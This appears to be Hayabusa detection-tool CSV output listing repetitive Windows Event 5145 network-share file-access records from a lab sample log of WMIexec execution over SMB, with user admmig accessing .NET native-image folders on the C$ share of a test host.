10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 
